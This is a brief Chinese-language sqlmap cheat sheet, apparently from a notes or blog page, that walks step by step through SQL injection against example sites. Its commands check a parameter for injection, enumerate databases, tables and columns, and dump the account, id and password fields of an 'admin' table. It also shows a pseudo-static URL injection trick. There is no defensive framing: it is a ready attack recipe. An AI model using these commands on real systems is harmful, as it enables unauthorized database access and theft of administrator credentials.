基础版:
- 检查注入点
sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11
- 列数据库信息
sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --dbs
- 指定库名列出所有表
sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 --tables
- 指定库名表名列出所有字段
sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin --columns
- 指定库名表名字段dump出指定字段
sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin -C ac,id,password --dump
SQLMAP伪静态注入:
注入页面:http://www.xxx.org/news/class/?103.htm
命令:python sqlmap.py -u “http://www.xxx.org/news/class/?103*.html”
时间: 2024-10-23 17:33:06